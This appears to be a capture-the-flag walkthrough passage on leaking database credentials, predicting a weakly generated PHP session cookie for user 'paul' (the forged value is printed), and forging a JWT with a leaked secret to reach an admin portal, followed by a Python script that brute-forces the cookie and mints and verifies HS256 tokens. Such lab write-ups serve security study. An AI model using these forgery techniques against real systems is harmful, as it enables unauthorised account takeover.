Leaking Secrets and User Configurations
MySQL login credentials
From the db.php file, we manage to leak the MySQL login username and password. However, MySQL does not allow remote access, so the credentials cannot be used directly and we have to look for other ways to use them. Both the portal and the book search site share the same database credentials.
JWT secret leaked
Login requirements
Based on the PHP code logic in portal/includes/fileController.php, we need to log in as Paul.
Leaked Cookie generation method
Going further into portal/cookie.php, we found the method used to generate the PHP session cookie: it combines the username with a fixed, hardcoded secret that is supposed to be changed every week, plus one character picked at random from the username. Because the only variable input is one character of the four-letter username paul, there are just four candidate cookies to try. By brute-forcing all four characters of paul, we found that the letter l is the correct one.
Concatenating the username paul with the MD5 of the hardcoded secret, with the random character replaced by l, yields the cookie: paul47200b180ccd6835d25d034eeb6e6390
After crafting the JWT token with the leaked secret and the PHPSESSID cookie above, we can log in as Paul in the admin portal.
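The two forgeries above, as an added worked example that is not the challenge's own code: the first part models the cookie.php scheme as it is described (username followed by md5(secret + one character drawn at random from the username); the exact concatenation order and the real secret are assumptions, a placeholder secret is used) and shows why the "random" component reduces to at most four guesses; the second part mints a JWT with a leaked HMAC secret (HS256 is assumed, since the writeup does not state the algorithm) and checks that it validates. The validator callback stands in for a request to the portal.

```python
import base64
import hashlib
import hmac
import json
import secrets

# --- Part 1: the PHPSESSID cookie scheme from portal/cookie.php (modelled) ---
# Assumed layout: cookie = username + md5(secret + one character picked at random
# from the username). The challenge's real secret is NOT reproduced; placeholder only.
PLACEHOLDER_SECRET = "rotate-me-every-week"


def make_session_cookie(username, secret, picked=None):
    """Server-side cookie generation as modelled here (not the challenge's code)."""
    if picked is None:
        picked = secrets.choice(username)  # the only 'random' input to the cookie
    return username + hashlib.md5((secret + picked).encode()).hexdigest()


def candidate_cookies(username, secret):
    """Every cookie the server could possibly issue for this user: one per distinct
    character of the username, so at most len(username) guesses (4 for 'paul')."""
    return {ch: make_session_cookie(username, secret, ch) for ch in dict.fromkeys(username)}


def brute_force_cookie(username, secret, is_valid):
    """Try each candidate against is_valid (a stand-in for sending it to the portal).
    Returns (character, cookie) on success, None if no candidate is accepted."""
    for ch, cookie in candidate_cookies(username, secret).items():
        if is_valid(cookie):
            return ch, cookie
    return None


# --- Part 2: minting a JWT with a leaked signing secret (HS256 assumed) ---
def _b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def forge_jwt(claims, secret):
    """Build header.payload.signature with HMAC-SHA256 over the first two parts."""
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = _b64url(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(secret.encode(), f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url(sig)}"


def verify_jwt(token, secret):
    """Minimal HS256 check, used only to confirm the forged token validates.
    Returns the decoded claims, or None when the signature does not match."""
    header, payload, sig = token.split(".")
    expected = hmac.new(secret.encode(), f"{header}.{payload}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(_b64url(expected), sig):
        return None
    pad = "=" * (-len(payload) % 4)  # restore base64 padding before decoding
    return json.loads(base64.urlsafe_b64decode(payload + pad))


if __name__ == "__main__":
    # Constructed scenario: the portal issued Paul a cookie using its random pick.
    issued = make_session_cookie("paul", PLACEHOLDER_SECRET)
    print("PHPSESSID recovered:", brute_force_cookie("paul", PLACEHOLDER_SECRET, lambda c: c == issued))
    # Constructed placeholder for the leaked JWT secret (the real one is not shown here).
    token = forge_jwt({"user": "paul", "role": "admin"}, "leaked-jwt-secret-placeholder")
    print("JWT:", token)
    print("validates as:", verify_jwt(token, "leaked-jwt-secret-placeholder"))
```

In a real run, is_valid would issue an authenticated request to the portal with each candidate PHPSESSID and report whether the response is a logged-in page; because the candidate set is bounded by the username length, this is four requests, not a search.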